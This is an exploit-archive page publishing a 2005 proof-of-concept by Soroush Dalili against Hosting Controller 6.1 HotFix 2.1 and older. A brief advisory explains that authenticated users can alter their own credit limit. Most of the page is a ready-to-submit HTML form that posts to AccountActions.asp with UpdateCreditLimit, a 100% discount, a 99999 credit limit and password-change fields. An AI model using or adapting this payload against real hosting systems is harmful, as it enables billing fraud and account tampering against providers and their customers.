[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit
# Published : 2005-07-10
# Author : Soroush Dalili
# Previous Title : SlimFTPd <= 3.16 Remote Buffer Overflow Exploit
# Next Title : Baby Web Server <= 2.6.2 Command Validation Exploit
Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
Title: Hosting controller program have a security bug in "AccountActions.asp" that an authenticated
user can change his/her credit and buy some services!
Version: 6.1 HotFix 2.1 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to manage a host.
Exploit code to proof:
--------------------------------
GET CREDIT<br>Soroush Dalili from GSG<br>
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value=""></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
# www.Syue.com [2005-07-10]